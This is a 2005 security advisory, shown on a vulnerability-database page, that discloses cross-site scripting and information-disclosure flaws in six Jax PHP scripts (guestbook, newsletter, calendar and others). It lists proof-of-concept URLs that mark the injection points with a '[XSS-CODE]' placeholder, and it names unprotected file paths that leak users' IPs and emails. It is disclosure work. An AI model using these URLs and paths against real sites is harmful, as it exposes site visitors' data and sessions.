Vulners
Lucene search
JaxXSS.txt
`############################################
Jax PHP Scripts multiple vulnerabilities
vendor url:http://www.jtr.de/scripting/php/
Advisory:http://lostmon.blogspot.com/2005/08/
jax-php-scripts-multiple.html
vendor notify:yes exploit available:yes
#############################################
###########
sumary:
###########
0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline
###############
0- Description
###############
Jax scripts is a collection of usefull php scripts to added or include
in a web-site.
Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook
Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a
WWW Petitionbook
Jax Newsletter (GPL)* ==> php script for running online Mailing lists
/ Newsletters
(Mailing List Manager)
Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists
(Hyperlink Manager)
Jax Calendar (GPL)* ==> php script for running a simple Web Calendar
(calendar manager)
Jax DWT Editor (GPL)* ==> php script for editing html files based on
Dreamweaver templates
(Template Editor)
###################
1-Products affected
###################
Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.
##################
2- Jax Guestbook
##################
Cross-Site Scripting and information disclosure:
http://[victim]/guestbook/jax_guestbook.php?page=2&language=
english&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/jax_guestbook.php?page=2&language=english
[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?page=2
[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?mailto=
9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]
http://[victim]/guestbook/guestbook
// clients ip who have post a firm in guestbook
http://[victim]/guestbook/guestbook_ips2block
//list of ips banned
http://[victim]/guestbook/ips2block
//list of ips banned
http://[victim]/guestbook/formmailer/logfile.csv
// ips ,from users send via formmail.php script.
################
versions
###############
Jax Guestbook v3.1
Jax Guestbook v3.31
###################
3- Jax Petitionbook
###################
Cross-Site Scripting and information disclosure:
http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/petitionbook/shrimp_petition.php?page=3
&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/shrimp_petition.php?page=3
[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/formmailer.log
// all ip , and message what all users sent via formmail
http://[victim]/petitionbook/ips2block
//all ips banned
http://[victim]/petitionbook/petitionbook
//all ips of people have signed the petition
#################
4- Jax Newsletter
#################
Cross-Site Scripting and information disclosure:
http://[victim]/newsletter/jax_newsletter.php?language=
German[XSS-CODE]&ml_id=1
http://[victim]/newsletter/sign_in.php?do=sign_in
&language=german[XSS-CODE]&ml_id=1&ml_id=1
http://[victim]/newsletter/archive.php?
language=spanish[XSS-CODE]
http://[victim]/newsletter/logs/jnl_records
// information disclosure form users ,direct request
to this file reveals:
"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" from registered users.
############
versions
############
Jax Newsletter v2.14
Jax Newsletter v2.10
#################
5- Jax LinkLists
#################
Cross-Site Scripting and information disclosure:
http://[victim]/linklists/jax_linklists.php?
language=English[XSS-CODE]
http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]
http://[victim]/linklists/suggestions.csv
// direct request disclose ip of client who
have suggest a link.
#############
versions
#############
Jax LinkLists v1.1
Jax LinkLists v1.0
#################
6- Jax Calendar
#################
Cross-Site Scripting:
http://[victim]/calendar/jax_calendar.php?Y=2005
[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0
9437c00badaf419eb0db5&cal_id=0&language=spanish&
gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-
%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-
+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8
[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba
daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=
d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18
%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im
+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e
b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls
ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe
ld[XSS-CODE]
http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&
cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30
// all variables afected by XSS flaws
##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33
#################
7- Jax DWT Editor
#################
Cross-Site Scripting:
http://[victim]/dwt_editor/dwt_editor.php?language=english
[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?language=english
&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=
%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=
german&area=textbereich2[XSS-CODE]
##############
versions
##############
Jax DWT Editor v1.0
###################
8- Timeline
###################
discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005
#################### nd #############################
Thnx to estrella to be my ligth.
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4